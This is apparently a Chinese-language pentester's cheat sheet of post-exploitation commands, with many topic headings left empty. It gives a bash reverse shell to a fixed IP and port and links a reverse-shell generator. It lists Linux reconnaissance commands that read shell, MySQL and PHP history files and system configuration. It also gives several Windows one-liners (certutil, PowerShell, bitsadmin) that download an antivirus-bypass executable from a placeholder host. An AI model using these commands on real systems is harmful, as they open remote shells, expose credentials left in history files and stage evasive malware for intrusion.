常用记不住的命令(补充ing)

Metasploit

生成木马

meterpreter

配置静态路由

run autoroute -s 10.xx.xx.xx/24

Linux

反弹shell

bash:

bash -i >& /dev/tcp/192.168.65.128**/**6767 0>&1

更多：

https://www.revshells.com/

信息收集

是否在docker中

/proc/1/cgroup

系统版本

cat /etc/issue

内核版本

cat /proc/version

环境变量

cat /etc/profile

开机自启

cat /etc/crontab

命令记录
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history

Windows

信息收集

下载文件

certutil.exe -urlcache -split -f “http://ip:port/BypassAV.exe" bad.txt

powershell Invoke-WebRequest -Uri http://ip:port/BypassAV.exe -OutFile a.exe

powershell Start-BitsTransfer -Source http://ip:port/BypassAV.exe -Destination a.txt

powershell (new-object System.Net.WebClient).DownloadFile(‘ip:port/BypassAV.exe’, ‘a.exe’)

bitsadmin /transfer myDownLoadJob /download /priority normal “ip:port/BypassAV.exe”

mimikataz

CobaltStrike

SQL注入

手工注入

SQLmap

Codeql

docker

链接

https://0range-x.github.io/2022/01/26/Domain-penetration_one-stop/